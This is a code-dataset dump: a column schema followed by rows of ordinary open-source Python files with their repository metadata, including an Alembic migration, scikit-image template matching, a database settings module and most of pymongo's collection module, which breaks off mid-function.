| column | dtype | values |
|---|---|---|
| hexsha | string | length 40 |
| size | int64 | 3 to 1.03M |
| ext | string | 10 classes |
| lang | string | 1 class |
| max_stars_repo_path | string | length 3 to 972 |
| max_stars_repo_name | string | length 6 to 130 |
| max_stars_repo_head_hexsha | string | length 40 to 78 |
| max_stars_repo_licenses | sequence | length 1 to 10 |
| max_stars_count | int64 | 1 to 191k, nullable |
| max_stars_repo_stars_event_min_datetime | string | length 24, nullable |
| max_stars_repo_stars_event_max_datetime | string | length 24, nullable |
| max_issues_repo_path | string | length 3 to 972 |
| max_issues_repo_name | string | length 6 to 130 |
| max_issues_repo_head_hexsha | string | length 40 to 78 |
| max_issues_repo_licenses | sequence | length 1 to 10 |
| max_issues_count | int64 | 1 to 116k, nullable |
| max_issues_repo_issues_event_min_datetime | string | length 24, nullable |
| max_issues_repo_issues_event_max_datetime | string | length 24, nullable |
| max_forks_repo_path | string | length 3 to 972 |
| max_forks_repo_name | string | length 6 to 130 |
| max_forks_repo_head_hexsha | string | length 40 to 78 |
| max_forks_repo_licenses | sequence | length 1 to 10 |
| max_forks_count | int64 | 1 to 105k, nullable |
| max_forks_repo_forks_event_min_datetime | string | length 24, nullable |
| max_forks_repo_forks_event_max_datetime | string | length 24, nullable |
| content | string | length 3 to 1.03M |
| avg_line_length | float64 | 1.13 to 941k |
| max_line_length | int64 | 2 to 941k |
| alphanum_fraction | float64 | 0 to 1 |
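Each record below follows this schema: one source file per row, its repository metadata repeated for the stars/issues/forks views, the file text in `content`, and the trailing `avg_line_length | max_line_length | alphanum_fraction` cells. As a minimal sketch of loading and inspecting such a dump with the `datasets` library (the Parquet path below is a placeholder, not part of the source):

```python
# Minimal sketch: load a local Parquet export with this schema and inspect one row.
# "data/train-00000.parquet" is a placeholder path, not taken from the source.
from datasets import load_dataset

ds = load_dataset("parquet", data_files="data/train-00000.parquet", split="train")

row = ds[0]
print(row["max_stars_repo_name"], row["max_stars_repo_path"], row["size"])
print(row["max_stars_repo_licenses"], row["max_stars_count"])
print(row["content"][:200])                    # first 200 characters of the file
print(row["avg_line_length"], row["max_line_length"], row["alphanum_fraction"])
```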
ef5ab39f15ba19cf26d154d97b1439d120a1ea77 | 1,027 | py | Python | migrations/versions/2289e585ec7b_.py | apoorvkhare07/SUMSarizer | ff8264906c380b4d5e6a52a23040bb8bff361c92 | ["MIT"] | 9 | 2015-03-08T07:45:30.000Z | 2019-02-10T04:22:34.000Z | migrations/versions/2289e585ec7b_.py | apoorvkhare07/SUMSarizer | ff8264906c380b4d5e6a52a23040bb8bff361c92 | ["MIT"] | 45 | 2015-04-09T00:32:09.000Z | 2018-08-22T18:04:53.000Z | migrations/versions/2289e585ec7b_.py | apoorvkhare07/SUMSarizer | ff8264906c380b4d5e6a52a23040bb8bff361c92 | ["MIT"] | 13 | 2015-04-08T23:52:05.000Z | 2019-02-20T10:22:33.000Z |
"""empty message
Revision ID: 2289e585ec7b
Revises: 4291771faa57
Create Date: 2016-02-29 01:54:50.285413
"""
# revision identifiers, used by Alembic.
revision = '2289e585ec7b'
down_revision = '4291771faa57'
from alembic import op
import sqlalchemy as sa
def upgrade():
### commands auto generated by Alembic - please adjust! ###
op.create_table('sz_job',
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('study_id', sa.Integer(), nullable=True),
sa.Column('created_at', sa.DateTime(), nullable=True),
sa.Column('state', sa.String(length=64), nullable=True),
sa.ForeignKeyConstraint(['study_id'], ['studies.id'], ),
sa.PrimaryKeyConstraint('id')
)
op.create_index(op.f('ix_sz_job_study_id'), 'sz_job', ['study_id'], unique=False)
### end Alembic commands ###
def downgrade():
### commands auto generated by Alembic - please adjust! ###
op.drop_index(op.f('ix_sz_job_study_id'), table_name='sz_job')
op.drop_table('sz_job')
### end Alembic commands ###
| 28.527778 | 85 | 0.682571 |
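The record above is an Alembic migration module (an upgrade/downgrade pair that creates the `sz_job` table). As a hedged sketch of how such a revision is usually applied programmatically, assuming a configured `alembic.ini` and migration environment (none of this comes from the dataset row):

```python
# Sketch: apply Alembic revisions like the one above from Python.
# Assumes alembic.ini and the migrations/ environment are already set up.
from alembic.config import Config
from alembic import command

cfg = Config("alembic.ini")      # placeholder path, an assumption
command.upgrade(cfg, "head")     # runs upgrade() of every pending revision
# command.downgrade(cfg, "-1")   # would run downgrade() of the latest revision
```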
f4594662999339f01695fc3e95b0497e5787ca09 | 292 | py | Python | python/katana/local/_graph_numba.py | bobdc/katana | 44b85645ef3955dc10653f64779bfec4231f215c | ["BSD-3-Clause"] | 1 | 2022-03-17T11:55:26.000Z | 2022-03-17T11:55:26.000Z | python/katana/local/_graph_numba.py | bobdc/katana | 44b85645ef3955dc10653f64779bfec4231f215c | ["BSD-3-Clause"] | null | null | null | python/katana/local/_graph_numba.py | bobdc/katana | 44b85645ef3955dc10653f64779bfec4231f215c | ["BSD-3-Clause"] | null | null | null |
from numba.extending import overload, overload_method
from katana.local_native import Graph
__all__ = []
@overload_method(Graph._numba_type_wrapper.Type, "node_ids")
def overload_Graph_nodes(self):
_ = self
def impl(self):
return range(self.num_nodes())
return impl
| 18.25 | 60 | 0.736301 |
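The record above registers a Numba `overload_method` for `Graph.node_ids`, so jit-compiled code can iterate a graph's node ids. A generic sketch of the same `numba.extending` mechanism, using a free-function `overload` and hypothetical helper names instead of Katana's `Graph` type:

```python
# Generic sketch of numba.extending.overload: give a plain-Python helper a typed
# implementation so it can be called from @njit-compiled code (clamp is hypothetical).
import numpy as np
from numba import njit
from numba.extending import overload


def clamp(x, lo, hi):
    """Pure-Python reference implementation."""
    return max(lo, min(x, hi))


@overload(clamp)
def _clamp_overload(x, lo, hi):
    # The returned impl is what nopython-mode callers of clamp() actually run.
    def impl(x, lo, hi):
        return max(lo, min(x, hi))
    return impl


@njit
def clip_all(values, lo, hi):
    out = np.empty_like(values)
    for i in range(values.size):
        out[i] = clamp(values[i], lo, hi)
    return out


print(clip_all(np.array([-1.0, 0.5, 2.0]), 0.0, 1.0))  # [0.  0.5 1. ]
```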
ad1635c37d775cccf4d3148e12524b788dbeb79e | 6,553 | py | Python | skimage/feature/template.py | zhanwenchen/scikit-image | af8a78e5b12ebb5709a57f9350b4b1f4c8f0c7db | ["BSD-3-Clause"] | 3 | 2019-02-28T16:05:36.000Z | 2020-04-03T17:29:07.000Z | Lib/site-packages/skimage/feature/template.py | caiyongji/Anaconda-py36.5-tensorflow-built-env | f4eb40b5ca3f49dfc929ff3ad2b4bb877e9663e2 | ["PSF-2.0"] | 26 | 2020-03-24T18:07:06.000Z | 2022-03-12T00:12:27.000Z | Lib/site-packages/skimage/feature/template.py | caiyongji/Anaconda-py36.5-tensorflow-built-env | f4eb40b5ca3f49dfc929ff3ad2b4bb877e9663e2 | ["PSF-2.0"] | 3 | 2019-12-31T23:21:40.000Z | 2020-04-03T17:29:08.000Z |
import numpy as np
from scipy.signal import fftconvolve
from .._shared.utils import assert_nD
def _window_sum_2d(image, window_shape):
window_sum = np.cumsum(image, axis=0)
window_sum = (window_sum[window_shape[0]:-1]
- window_sum[:-window_shape[0] - 1])
window_sum = np.cumsum(window_sum, axis=1)
window_sum = (window_sum[:, window_shape[1]:-1]
- window_sum[:, :-window_shape[1] - 1])
return window_sum
def _window_sum_3d(image, window_shape):
window_sum = _window_sum_2d(image, window_shape)
window_sum = np.cumsum(window_sum, axis=2)
window_sum = (window_sum[:, :, window_shape[2]:-1]
- window_sum[:, :, :-window_shape[2] - 1])
return window_sum
def match_template(image, template, pad_input=False, mode='constant',
constant_values=0):
"""Match a template to a 2-D or 3-D image using normalized correlation.
The output is an array with values between -1.0 and 1.0. The value at a
given position corresponds to the correlation coefficient between the image
and the template.
For `pad_input=True` matches correspond to the center and otherwise to the
top-left corner of the template. To find the best match you must search for
peaks in the response (output) image.
Parameters
----------
image : (M, N[, D]) array
2-D or 3-D input image.
template : (m, n[, d]) array
Template to locate. It must be `(m <= M, n <= N[, d <= D])`.
pad_input : bool
If True, pad `image` so that output is the same size as the image, and
output values correspond to the template center. Otherwise, the output
is an array with shape `(M - m + 1, N - n + 1)` for an `(M, N)` image
and an `(m, n)` template, and matches correspond to origin
(top-left corner) of the template.
mode : see `numpy.pad`, optional
Padding mode.
constant_values : see `numpy.pad`, optional
Constant values used in conjunction with ``mode='constant'``.
Returns
-------
output : array
Response image with correlation coefficients.
Notes
-----
Details on the cross-correlation are presented in [1]_. This implementation
uses FFT convolutions of the image and the template. Reference [2]_
presents similar derivations but the approximation presented in this
reference is not used in our implementation.
References
----------
.. [1] J. P. Lewis, "Fast Normalized Cross-Correlation", Industrial Light
and Magic.
.. [2] Briechle and Hanebeck, "Template Matching using Fast Normalized
Cross Correlation", Proceedings of the SPIE (2001).
:DOI:`10.1117/12.421129`
Examples
--------
>>> template = np.zeros((3, 3))
>>> template[1, 1] = 1
>>> template
array([[ 0., 0., 0.],
[ 0., 1., 0.],
[ 0., 0., 0.]])
>>> image = np.zeros((6, 6))
>>> image[1, 1] = 1
>>> image[4, 4] = -1
>>> image
array([[ 0., 0., 0., 0., 0., 0.],
[ 0., 1., 0., 0., 0., 0.],
[ 0., 0., 0., 0., 0., 0.],
[ 0., 0., 0., 0., 0., 0.],
[ 0., 0., 0., 0., -1., 0.],
[ 0., 0., 0., 0., 0., 0.]])
>>> result = match_template(image, template)
>>> np.round(result, 3)
array([[ 1. , -0.125, 0. , 0. ],
[-0.125, -0.125, 0. , 0. ],
[ 0. , 0. , 0.125, 0.125],
[ 0. , 0. , 0.125, -1. ]])
>>> result = match_template(image, template, pad_input=True)
>>> np.round(result, 3)
array([[-0.125, -0.125, -0.125, 0. , 0. , 0. ],
[-0.125, 1. , -0.125, 0. , 0. , 0. ],
[-0.125, -0.125, -0.125, 0. , 0. , 0. ],
[ 0. , 0. , 0. , 0.125, 0.125, 0.125],
[ 0. , 0. , 0. , 0.125, -1. , 0.125],
[ 0. , 0. , 0. , 0.125, 0.125, 0.125]])
"""
assert_nD(image, (2, 3))
if image.ndim < template.ndim:
raise ValueError("Dimensionality of template must be less than or "
"equal to the dimensionality of image.")
if np.any(np.less(image.shape, template.shape)):
raise ValueError("Image must be larger than template.")
image_shape = image.shape
image = np.array(image, dtype=np.float64, copy=False)
pad_width = tuple((width, width) for width in template.shape)
if mode == 'constant':
image = np.pad(image, pad_width=pad_width, mode=mode,
constant_values=constant_values)
else:
image = np.pad(image, pad_width=pad_width, mode=mode)
# Use special case for 2-D images for much better performance in
# computation of integral images
if image.ndim == 2:
image_window_sum = _window_sum_2d(image, template.shape)
image_window_sum2 = _window_sum_2d(image ** 2, template.shape)
elif image.ndim == 3:
image_window_sum = _window_sum_3d(image, template.shape)
image_window_sum2 = _window_sum_3d(image ** 2, template.shape)
template_mean = template.mean()
template_volume = np.prod(template.shape)
template_ssd = np.sum((template - template_mean) ** 2)
if image.ndim == 2:
xcorr = fftconvolve(image, template[::-1, ::-1],
mode="valid")[1:-1, 1:-1]
elif image.ndim == 3:
xcorr = fftconvolve(image, template[::-1, ::-1, ::-1],
mode="valid")[1:-1, 1:-1, 1:-1]
numerator = xcorr - image_window_sum * template_mean
denominator = image_window_sum2
np.multiply(image_window_sum, image_window_sum, out=image_window_sum)
np.divide(image_window_sum, template_volume, out=image_window_sum)
denominator -= image_window_sum
denominator *= template_ssd
np.maximum(denominator, 0, out=denominator) # sqrt of negative number not allowed
np.sqrt(denominator, out=denominator)
response = np.zeros_like(xcorr, dtype=np.float64)
# avoid zero-division
mask = denominator > np.finfo(np.float64).eps
response[mask] = numerator[mask] / denominator[mask]
slices = []
for i in range(template.ndim):
if pad_input:
d0 = (template.shape[i] - 1) // 2
d1 = d0 + image_shape[i]
else:
d0 = template.shape[i] - 1
d1 = d0 + image_shape[i] - template.shape[i] + 1
slices.append(slice(d0, d1))
return response[tuple(slices)]
| 36.405556 | 86 | 0.572104 |
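The record above is scikit-image's `match_template` implementation. A short usage sketch, mirroring the example in its docstring and assuming scikit-image is installed (the arrays are synthetic):

```python
# Usage sketch for match_template: locate where a small template best matches a
# larger image; with pad_input=True the response peak indexes the template centre.
import numpy as np
from skimage.feature import match_template

image = np.zeros((100, 100))
image[40, 60] = 1.0              # single bright pixel to find
template = np.zeros((3, 3))
template[1, 1] = 1.0

result = match_template(image, template, pad_input=True)
peak = np.unravel_index(np.argmax(result), result.shape)
print(peak)                      # expected: (40, 60)
```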
836c1fc83c17b339ee262c5a02603390e4873e85 | 479 | py | Python | malcolm/modules/pmac/parts/pmacrunnablechildpart.py | MattTaylorDLS/pymalcolm | 995a8e4729bd745f8f617969111cc5a34ce1ac14 | ["Apache-2.0"] | null | null | null | malcolm/modules/pmac/parts/pmacrunnablechildpart.py | MattTaylorDLS/pymalcolm | 995a8e4729bd745f8f617969111cc5a34ce1ac14 | ["Apache-2.0"] | null | null | null | malcolm/modules/pmac/parts/pmacrunnablechildpart.py | MattTaylorDLS/pymalcolm | 995a8e4729bd745f8f617969111cc5a34ce1ac14 | ["Apache-2.0"] | null | null | null |
from malcolm.modules.scanning.controllers import RunnableController
from malcolm.modules.scanning.parts import RunnableChildPart
class PmacRunnableChildPart(RunnableChildPart):
# TODO: not sure if this is still needed to reset triggers on pause?
# Think it probably is because we need to reset triggers before rearming
# detectors
@RunnableController.Pause
def pause(self, context):
child = context.block_view(self.params.mri)
child.pause()
| 36.846154 | 76 | 0.762004 |
ed895d59a38557f542237ab3b2b97220cba1300d | 158 | py | Python | ofstest/ofs/doctype/credit_and_sales_transactions/test_credit_and_sales_transactions.py | keithyang77/ofstest | aed4c8d22ea1f7857d6e6fcf774ec36d26a5ed17 | ["MIT"] | null | null | null | ofstest/ofs/doctype/credit_and_sales_transactions/test_credit_and_sales_transactions.py | keithyang77/ofstest | aed4c8d22ea1f7857d6e6fcf774ec36d26a5ed17 | ["MIT"] | null | null | null | ofstest/ofs/doctype/credit_and_sales_transactions/test_credit_and_sales_transactions.py | keithyang77/ofstest | aed4c8d22ea1f7857d6e6fcf774ec36d26a5ed17 | ["MIT"] | null | null | null |
# Copyright (c) 2021, mds and Contributors
# See license.txt
# import frappe
import unittest
class TestCreditandSalesTransactions(unittest.TestCase):
pass
| 17.555556 | 56 | 0.797468 |
c826274fe8993fbbf60897a372c7ee592cc592cd | 350 | py | Python | app/settings.py | mgajewskik/website_scraper_api | 7dab20863ac8461f24cff79f36e39d3ad2b40ed0 | ["MIT"] | null | null | null | app/settings.py | mgajewskik/website_scraper_api | 7dab20863ac8461f24cff79f36e39d3ad2b40ed0 | ["MIT"] | null | null | null | app/settings.py | mgajewskik/website_scraper_api | 7dab20863ac8461f24cff79f36e39d3ad2b40ed0 | ["MIT"] | null | null | null |
import os
DATA_PATH = os.getenv("DATA_PATH")
PG = {
"host": os.getenv("POSTGRES_NAME"),
"db": os.getenv("PG_DATABASE"),
"user": os.getenv("PG_USER"),
"password": os.getenv("PG_PASSWORD"),
"port": os.getenv("PG_PORT"),
}
POSTGRES_URL = (
f"postgresql://{PG['user']}:{PG['password']}@{PG['host']}:{PG['port']}/{PG['db']}"
)
| 20.588235 | 86 | 0.577143 |
2d233472d179414bd09210b47455df56671dc57e | 75 | py | Python | machine_learning/similarity/problem/__init__.py | caserwin/daily-learning-python | 01fea4c5d4e86cbea2dbef8817146f018b5f1479 | ["Apache-2.0"] | 1 | 2019-05-04T07:27:18.000Z | 2019-05-04T07:27:18.000Z | machine_learning/similarity/problem/__init__.py | caserwin/daily-learning-python | 01fea4c5d4e86cbea2dbef8817146f018b5f1479 | ["Apache-2.0"] | null | null | null | machine_learning/similarity/problem/__init__.py | caserwin/daily-learning-python | 01fea4c5d4e86cbea2dbef8817146f018b5f1479 | ["Apache-2.0"] | 1 | 2018-09-20T01:49:36.000Z | 2018-09-20T01:49:36.000Z |
# -*- coding: utf-8 -*-
# @Time : 2019/1/24 上午10:09
# @Author : yidxue
| 18.75 | 30 | 0.52 |
24cb410aa9bd5f21bee0b5d9edad3aaa4c783db5 | 100,801 | py | Python | ADMIN/venv/lib/python2.7/site-packages/pymongo/collection.py | PayPal-Opportunity-Hack-Chennai-2016/surabi-trust | 7f0d2038d5152c8cccb8d9db90b3edc589c3e3d1 | [
"Apache-2.0"
] | 1 | 2016-10-09T01:36:54.000Z | 2016-10-09T01:36:54.000Z | django_project/env/lib/python2.7/site-packages/pymongo/collection.py | bocaaust/FreshLife | 8a4efd9397e5e316f97abacaa765f3d4f9a7b371 | [
"Apache-2.0"
] | 7 | 2016-11-12T11:20:25.000Z | 2022-03-11T23:11:53.000Z | django_project/env/lib/python2.7/site-packages/pymongo/collection.py | bocaaust/FreshLife | 8a4efd9397e5e316f97abacaa765f3d4f9a7b371 | [
"Apache-2.0"
] | 3 | 2016-11-12T09:21:38.000Z | 2016-11-14T14:00:31.000Z | # Copyright 2009-2015 MongoDB, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Collection level utilities for Mongo."""
import collections
import datetime
import warnings
from bson.code import Code
from bson.objectid import ObjectId
from bson.py3compat import (_unicode,
integer_types,
string_type)
from bson.raw_bson import RawBSONDocument
from bson.codec_options import CodecOptions
from bson.son import SON
from pymongo import (common,
helpers,
message)
from pymongo.bulk import BulkOperationBuilder, _Bulk
from pymongo.command_cursor import CommandCursor
from pymongo.cursor import Cursor
from pymongo.errors import ConfigurationError, InvalidName, OperationFailure
from pymongo.helpers import _check_write_command_response
from pymongo.operations import _WriteOp, IndexModel
from pymongo.read_concern import DEFAULT_READ_CONCERN
from pymongo.read_preferences import ReadPreference
from pymongo.results import (BulkWriteResult,
DeleteResult,
InsertOneResult,
InsertManyResult,
UpdateResult)
from pymongo.write_concern import WriteConcern
try:
from collections import OrderedDict
_ORDERED_TYPES = (SON, OrderedDict)
except ImportError:
_ORDERED_TYPES = (SON,)
_NO_OBJ_ERROR = "No matching object found"
_UJOIN = u"%s.%s"
class ReturnDocument(object):
"""An enum used with
:meth:`~pymongo.collection.Collection.find_one_and_replace` and
:meth:`~pymongo.collection.Collection.find_one_and_update`.
"""
BEFORE = False
"""Return the original document before it was updated/replaced, or
``None`` if no document matches the query.
"""
AFTER = True
"""Return the updated/replaced or inserted document."""
class Collection(common.BaseObject):
"""A Mongo collection.
"""
def __init__(self, database, name, create=False, codec_options=None,
read_preference=None, write_concern=None, read_concern=None,
**kwargs):
"""Get / create a Mongo collection.
Raises :class:`TypeError` if `name` is not an instance of
:class:`basestring` (:class:`str` in python 3). Raises
:class:`~pymongo.errors.InvalidName` if `name` is not a valid
collection name. Any additional keyword arguments will be used
as options passed to the create command. See
:meth:`~pymongo.database.Database.create_collection` for valid
options.
If `create` is ``True`` or additional keyword arguments are
present a create command will be sent. Otherwise, a create
command will not be sent and the collection will be created
implicitly on first use.
:Parameters:
- `database`: the database to get a collection from
- `name`: the name of the collection to get
- `create` (optional): if ``True``, force collection
creation even without options being set
- `codec_options` (optional): An instance of
:class:`~bson.codec_options.CodecOptions`. If ``None`` (the
default) database.codec_options is used.
- `read_preference` (optional): The read preference to use. If
``None`` (the default) database.read_preference is used.
- `write_concern` (optional): An instance of
:class:`~pymongo.write_concern.WriteConcern`. If ``None`` (the
default) database.write_concern is used.
- `read_concern` (optional): An instance of
:class:`~pymongo.read_concern.ReadConcern`. If ``None`` (the
default) database.read_concern is used.
- `**kwargs` (optional): additional keyword arguments will
be passed as options for the create collection command
.. versionchanged:: 3.2
Added the read_concern option.
.. versionchanged:: 3.0
Added the codec_options, read_preference, and write_concern options.
Removed the uuid_subtype attribute.
:class:`~pymongo.collection.Collection` no longer returns an
instance of :class:`~pymongo.collection.Collection` for attribute
names with leading underscores. You must use dict-style lookups
instead::
collection['__my_collection__']
Not:
collection.__my_collection__
.. versionchanged:: 2.2
Removed deprecated argument: options
.. versionadded:: 2.1
uuid_subtype attribute
.. mongodoc:: collections
"""
super(Collection, self).__init__(
codec_options or database.codec_options,
read_preference or database.read_preference,
write_concern or database.write_concern,
read_concern or database.read_concern)
if not isinstance(name, string_type):
raise TypeError("name must be an instance "
"of %s" % (string_type.__name__,))
if not name or ".." in name:
raise InvalidName("collection names cannot be empty")
if "$" in name and not (name.startswith("oplog.$main") or
name.startswith("$cmd")):
raise InvalidName("collection names must not "
"contain '$': %r" % name)
if name[0] == "." or name[-1] == ".":
raise InvalidName("collection names must not start "
"or end with '.': %r" % name)
if "\x00" in name:
raise InvalidName("collection names must not contain the "
"null character")
self.__database = database
self.__name = _unicode(name)
self.__full_name = _UJOIN % (self.__database.name, self.__name)
if create or kwargs:
self.__create(kwargs)
self.__write_response_codec_options = self.codec_options._replace(
unicode_decode_error_handler='replace',
document_class=dict)
def _socket_for_reads(self):
return self.__database.client._socket_for_reads(self.read_preference)
def _socket_for_primary_reads(self):
return self.__database.client._socket_for_reads(ReadPreference.PRIMARY)
def _socket_for_writes(self):
return self.__database.client._socket_for_writes()
def _command(self, sock_info, command, slave_ok=False,
read_preference=None,
codec_options=None, check=True, allowable_errors=None,
read_concern=DEFAULT_READ_CONCERN):
"""Internal command helper.
:Parameters:
- `sock_info` - A SocketInfo instance.
- `command` - The command itself, as a SON instance.
- `slave_ok`: whether to set the SlaveOkay wire protocol bit.
- `codec_options` (optional) - An instance of
:class:`~bson.codec_options.CodecOptions`.
- `check`: raise OperationFailure if there are errors
- `allowable_errors`: errors to ignore if `check` is True
- `read_concern` (optional) - An instance of
:class:`~pymongo.read_concern.ReadConcern`.
:Returns:
# todo: don't return address
(result document, address of server the command was run on)
"""
return sock_info.command(self.__database.name,
command,
slave_ok,
read_preference or self.read_preference,
codec_options or self.codec_options,
check,
allowable_errors,
read_concern=read_concern)
def __create(self, options):
"""Sends a create command with the given options.
"""
cmd = SON([("create", self.__name)])
if options:
if "size" in options:
options["size"] = float(options["size"])
cmd.update(options)
with self._socket_for_writes() as sock_info:
self._command(
sock_info, cmd, read_preference=ReadPreference.PRIMARY)
def __getattr__(self, name):
"""Get a sub-collection of this collection by name.
Raises InvalidName if an invalid collection name is used.
:Parameters:
- `name`: the name of the collection to get
"""
if name.startswith('_'):
full_name = _UJOIN % (self.__name, name)
raise AttributeError(
"Collection has no attribute %r. To access the %s"
" collection, use database['%s']." % (
name, full_name, full_name))
return self.__getitem__(name)
def __getitem__(self, name):
return Collection(self.__database, _UJOIN % (self.__name, name))
def __repr__(self):
return "Collection(%r, %r)" % (self.__database, self.__name)
def __eq__(self, other):
if isinstance(other, Collection):
return (self.__database == other.database and
self.__name == other.name)
return NotImplemented
def __ne__(self, other):
return not self == other
@property
def full_name(self):
"""The full name of this :class:`Collection`.
The full name is of the form `database_name.collection_name`.
"""
return self.__full_name
@property
def name(self):
"""The name of this :class:`Collection`."""
return self.__name
@property
def database(self):
"""The :class:`~pymongo.database.Database` that this
:class:`Collection` is a part of.
"""
return self.__database
def with_options(
self, codec_options=None, read_preference=None,
write_concern=None, read_concern=None):
"""Get a clone of this collection changing the specified settings.
>>> coll1.read_preference
Primary()
>>> from pymongo import ReadPreference
>>> coll2 = coll1.with_options(read_preference=ReadPreference.SECONDARY)
>>> coll1.read_preference
Primary()
>>> coll2.read_preference
Secondary(tag_sets=None)
:Parameters:
- `codec_options` (optional): An instance of
:class:`~bson.codec_options.CodecOptions`. If ``None`` (the
default) the :attr:`codec_options` of this :class:`Collection`
is used.
- `read_preference` (optional): The read preference to use. If
``None`` (the default) the :attr:`read_preference` of this
:class:`Collection` is used. See :mod:`~pymongo.read_preferences`
for options.
- `write_concern` (optional): An instance of
:class:`~pymongo.write_concern.WriteConcern`. If ``None`` (the
default) the :attr:`write_concern` of this :class:`Collection`
is used.
- `read_concern` (optional): An instance of
:class:`~pymongo.read_concern.ReadConcern`. If ``None`` (the
default) the :attr:`read_concern` of this :class:`Collection`
is used.
"""
return Collection(self.__database,
self.__name,
False,
codec_options or self.codec_options,
read_preference or self.read_preference,
write_concern or self.write_concern,
read_concern or self.read_concern)
def initialize_unordered_bulk_op(self, bypass_document_validation=False):
"""Initialize an unordered batch of write operations.
Operations will be performed on the server in arbitrary order,
possibly in parallel. All operations will be attempted.
:Parameters:
- `bypass_document_validation`: (optional) If ``True``, allows the
write to opt-out of document level validation. Default is
``False``.
Returns a :class:`~pymongo.bulk.BulkOperationBuilder` instance.
See :ref:`unordered_bulk` for examples.
.. note:: `bypass_document_validation` requires server version
**>= 3.2**
.. versionchanged:: 3.2
Added bypass_document_validation support
.. versionadded:: 2.7
"""
return BulkOperationBuilder(self, False, bypass_document_validation)
def initialize_ordered_bulk_op(self, bypass_document_validation=False):
"""Initialize an ordered batch of write operations.
Operations will be performed on the server serially, in the
order provided. If an error occurs all remaining operations
are aborted.
:Parameters:
- `bypass_document_validation`: (optional) If ``True``, allows the
write to opt-out of document level validation. Default is
``False``.
Returns a :class:`~pymongo.bulk.BulkOperationBuilder` instance.
See :ref:`ordered_bulk` for examples.
.. note:: `bypass_document_validation` requires server version
**>= 3.2**
.. versionchanged:: 3.2
Added bypass_document_validation support
.. versionadded:: 2.7
"""
return BulkOperationBuilder(self, True, bypass_document_validation)
def bulk_write(self, requests, ordered=True,
bypass_document_validation=False):
"""Send a batch of write operations to the server.
Requests are passed as a list of write operation instances (
:class:`~pymongo.operations.InsertOne`,
:class:`~pymongo.operations.UpdateOne`,
:class:`~pymongo.operations.UpdateMany`,
:class:`~pymongo.operations.ReplaceOne`,
:class:`~pymongo.operations.DeleteOne`, or
:class:`~pymongo.operations.DeleteMany`).
>>> for doc in db.test.find({}):
... print(doc)
...
{u'x': 1, u'_id': ObjectId('54f62e60fba5226811f634ef')}
{u'x': 1, u'_id': ObjectId('54f62e60fba5226811f634f0')}
>>> # DeleteMany, UpdateOne, and UpdateMany are also available.
...
>>> from pymongo import InsertOne, DeleteOne, ReplaceOne
>>> requests = [InsertOne({'y': 1}), DeleteOne({'x': 1}),
... ReplaceOne({'w': 1}, {'z': 1}, upsert=True)]
>>> result = db.test.bulk_write(requests)
>>> result.inserted_count
1
>>> result.deleted_count
1
>>> result.modified_count
0
>>> result.upserted_ids
{2: ObjectId('54f62ee28891e756a6e1abd5')}
>>> for doc in db.test.find({}):
... print(doc)
...
{u'x': 1, u'_id': ObjectId('54f62e60fba5226811f634f0')}
{u'y': 1, u'_id': ObjectId('54f62ee2fba5226811f634f1')}
{u'z': 1, u'_id': ObjectId('54f62ee28891e756a6e1abd5')}
:Parameters:
- `requests`: A list of write operations (see examples above).
- `ordered` (optional): If ``True`` (the default) requests will be
performed on the server serially, in the order provided. If an error
occurs all remaining operations are aborted. If ``False`` requests
will be performed on the server in arbitrary order, possibly in
parallel, and all operations will be attempted.
- `bypass_document_validation`: (optional) If ``True``, allows the
write to opt-out of document level validation. Default is
``False``.
:Returns:
An instance of :class:`~pymongo.results.BulkWriteResult`.
.. seealso:: :ref:`writes-and-ids`
.. note:: `bypass_document_validation` requires server version
**>= 3.2**
.. versionchanged:: 3.2
Added bypass_document_validation support
.. versionadded:: 3.0
"""
if not isinstance(requests, list):
raise TypeError("requests must be a list")
blk = _Bulk(self, ordered, bypass_document_validation)
for request in requests:
if not isinstance(request, _WriteOp):
raise TypeError("%r is not a valid request" % (request,))
request._add_to_bulk(blk)
bulk_api_result = blk.execute(self.write_concern.document)
if bulk_api_result is not None:
return BulkWriteResult(bulk_api_result, True)
return BulkWriteResult({}, False)
def _legacy_write(self, sock_info, name, cmd, acknowledged, op_id,
bypass_doc_val, func, *args):
"""Internal legacy write helper."""
# Cannot have both unacknowledged write and bypass document validation.
if (bypass_doc_val and not acknowledged and
sock_info.max_wire_version >= 4):
raise OperationFailure("Cannot set bypass_document_validation with"
" unacknowledged write concern")
listeners = self.database.client._event_listeners
publish = listeners.enabled_for_commands
if publish:
start = datetime.datetime.now()
rqst_id, msg, max_size = func(*args)
if publish:
duration = datetime.datetime.now() - start
listeners.publish_command_start(
cmd, self.__database.name, rqst_id, sock_info.address, op_id)
start = datetime.datetime.now()
try:
result = sock_info.legacy_write(
rqst_id, msg, max_size, acknowledged)
except Exception as exc:
if publish:
dur = (datetime.datetime.now() - start) + duration
if isinstance(exc, OperationFailure):
details = exc.details
# Succeed if GLE was successful and this is a write error.
if details.get("ok") and "n" in details:
reply = message._convert_write_result(
name, cmd, details)
listeners.publish_command_success(
dur, reply, name, rqst_id, sock_info.address, op_id)
raise
else:
details = message._convert_exception(exc)
listeners.publish_command_failure(
dur, details, name, rqst_id, sock_info.address, op_id)
raise
if publish:
if result is not None:
reply = message._convert_write_result(name, cmd, result)
else:
# Comply with APM spec.
reply = {'ok': 1}
duration = (datetime.datetime.now() - start) + duration
listeners.publish_command_success(
duration, reply, name, rqst_id, sock_info.address, op_id)
return result
def _insert_one(
self, sock_info, doc, ordered,
check_keys, manipulate, write_concern, op_id, bypass_doc_val):
"""Internal helper for inserting a single document."""
if manipulate:
doc = self.__database._apply_incoming_manipulators(doc, self)
if not isinstance(doc, RawBSONDocument) and '_id' not in doc:
doc['_id'] = ObjectId()
doc = self.__database._apply_incoming_copying_manipulators(doc,
self)
concern = (write_concern or self.write_concern).document
acknowledged = concern.get("w") != 0
command = SON([('insert', self.name),
('ordered', ordered),
('documents', [doc])])
if concern:
command['writeConcern'] = concern
if sock_info.max_wire_version > 1 and acknowledged:
if bypass_doc_val and sock_info.max_wire_version >= 4:
command['bypassDocumentValidation'] = True
# Insert command.
result = sock_info.command(
self.__database.name,
command,
codec_options=self.__write_response_codec_options,
check_keys=check_keys)
_check_write_command_response([(0, result)])
else:
